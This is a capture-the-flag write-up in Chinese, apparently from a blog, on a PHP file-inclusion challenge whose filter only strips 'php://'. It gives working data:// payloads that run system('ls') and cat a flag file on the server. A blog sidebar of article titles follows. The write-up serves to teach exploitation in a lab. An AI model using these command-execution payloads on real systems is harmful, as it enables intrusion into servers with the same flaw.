Web_php_include

进入题目源码直接出来了

<?php

show_source(__FILE__);

echo $_GET['hello'];

$page=$_GET['page'];

while (strstr($page, "php://")) {

    $page=str_replace("php://", "", $page);

}

include($page);

?>

看见了include函数并且发现过滤了php://，由此估计需要使用伪协议来读取flag内容，由于过滤掉了php，所以我们直接使用data://协议来执行指令

payload

?page=data://text/plain,<?system(%27ls%27);?>

然后又是cat查看一下就行

page=data://text/plain,<?system(%27cat%20fl4gisisish3r3.php%27);?>

但是页面没有回显任何内容，还以为我哪里做错了原来查看源码就发现了flag

最新文章

1. 自定义angularjs分页控件
2. node.js 学习
3. 小米手机(HM1SW)高通开发android程序全过程
4. JQ分页功能
5. 50条LINUX命令整理
6. Linux NFS 介绍
7. iOSS--生成有logo的二维码
8. 一个Java对象到底占用多大内存？
9. UIButton 在 iOS7.0与iOS7.1 中关于enabled的一点区别
10. memcache运维整理
11. XML Schema <第三篇>
12. 泛型集合、datatable常用数据类型转换Json帮助类
13. 用python实现简单购物车功能
14. Android进阶(二十八)上下文菜单ContextMenu使用案例
15. CSS实现div高度自适应
16. XSS攻击介绍
17. Spring Data
18. p值还是 FDR ?
19. 如何用Delphi开发网游外挂
20. [机器学习&数据挖掘]SVM---核函数

热门文章

1. Shell编程四剑客包括：find、sed、grep、awk
2. AHUACM寒假集训VI（网络流）
3. MySQL之InnoDB存储引擎 - 读书笔记
4. Pycharm：在Pycharm中使用控制台命令
5. 文件上传漏洞之MIME类型过滤
6. JQuery常见方法
7. 基于Kubernetes/K8S构建Jenkins持续集成平台(上)-2
8. 学习java Markdown语法
9. 微信公众号客服接口：out of response count limit 的原因
10. tensorflow源码解析系列文章索引